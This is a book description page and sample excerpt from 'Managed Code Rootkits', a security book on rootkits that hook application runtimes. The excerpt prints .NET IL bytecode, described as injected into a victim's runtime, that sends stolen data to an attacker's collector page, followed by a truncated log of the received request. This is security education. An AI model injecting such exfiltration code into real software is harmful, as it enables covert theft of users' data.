Managed Code Rootkits: Hooking into Runtime Environments

By Erez Metula

Managed Code Rootkits is the first book to cover application-level rootkits and other types of malware inside the application VM, which runs a platform-independent programming environment for processes. The book, divided into four parts, points out high-level attacks, which are developed in intermediate language.
The initial part of the book offers an overview of managed code rootkits. It explores environment models of managed code and the relationship of managed code to rootkits by studying how they use application VMs. It also discusses attackers of managed code rootkits and various attack scenarios. The second part of the book covers the development of managed code rootkits, starting with the tools used in producing managed code rootkits through their deployment.
The next part focuses on countermeasures that can possibly be used against managed code rootkits, including technical solutions, prevention, detection, and response tactics. The book concludes by presenting techniques that are somewhat similar to managed code rootkits, which can be used in solving problems.

  • Named a 2011 Best Hacking and Pen Testing Book by InfoSec Reviews
  • Introduces the reader briefly to managed code environments and rootkits in general
  • Completely details a new type of rootkit hiding in the application level and demonstrates how a hacker can change the language runtime implementation
  • Focuses on managed code including Java, .NET, and Android Dalvik, and reviews malware development scenarios


Sample text from Managed Code Rootkits: Hooking into Runtime Environments

Collector pages such as this one are often used by attackers to gather stolen information such as credentials, session IDs, and so on when carrying out phishing or XSS attacks. Now that the attacker has set up a page located at http:///DataStealer/Collect.aspx that collects information sent from remote machines, he can focus on the victim's machine. The idea is to force the victim to issue an HTTP request to the following URL:

    http:///DataStealer/Collect.aspx?data=StolenData

By appending the data the attacker wants to send (StolenData in this example) to the URL, the attacker can send the data to his machine. We need some invoker code that will create an HTTP request to the collector page. The following .NET IL bytecode, injected into the runtime, will do just that:

    ldstr "http:///DataStealer/Collect.aspx?data=StolenData"
    call class [System]System.Net.WebRequest [System]System.Net.WebRequest::Create(string)
    callvirt instance class [System]System.Net.WebResponse [System]System.Net.WebRequest::GetResponse()
    pop

Let's go over that code. The first thing the code does is declare the URL to which the request will be sent, including the request parameters. In this example, we used an HTTP GET request (which is the default request method when using the WebRequest class), setting the request target to http:///DataStealer/Collect.aspx?data=StolenData. The data we're sending in this example, the StolenData string, is concatenated to the URL, and the whole string is pushed onto the stack as a parameter for the Create method. This method, located in the WebRequest class, serves as an object factory that determines the type of object to create and initializes a new WebRequest instance.
Following that, we call the GetResponse method, which triggers the sending of the request and stores the response on the stack (as a WebResponse object). In this example, we were only interested in the request itself; therefore, the received response is cleared from the stack with a pop instruction.

Chapter 5: Manipulating the Runtime

Executing the previous code on the victim's machine will force it to issue an HTTP request to the attacker's page, which will create the following record on the remote machine, inside the input.dat file:

    New input has arrived:
    *******************************************************
    Query: data=Stolendata
    Remote address: 192.168.50.1
    Remote port: 4436
    Cookies:
    HTTP Headers:
    HTTP_CONNECTION:Keep-Alive
    HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
    HTTP_ACCEPT_ENCODING:gzip, deflate
    HTTP_ACCEPT_LANGUAGE:he
    HTTP_HOST:www.attacker.com
    HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.
